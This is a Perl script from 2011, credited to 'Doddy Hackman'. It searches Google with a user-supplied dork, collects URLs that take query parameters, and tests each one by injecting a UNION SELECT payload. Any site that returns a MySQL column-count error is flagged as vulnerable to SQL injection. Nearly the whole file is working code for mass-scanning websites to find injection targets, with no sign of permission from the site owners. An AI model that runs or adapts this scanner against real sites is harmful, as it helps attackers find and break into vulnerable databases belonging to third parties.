#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
 
use LWP::UserAgent;
use HTML::LinkExtor;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
 
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;
 
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
 
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
 
my @founds = repes(@founds);
 
return @founds; 
}
 
 
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}
 
sub get_links {
 
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
 
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}
 
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
 
sub head {
print "\n\n-- == Search Google == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
 
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?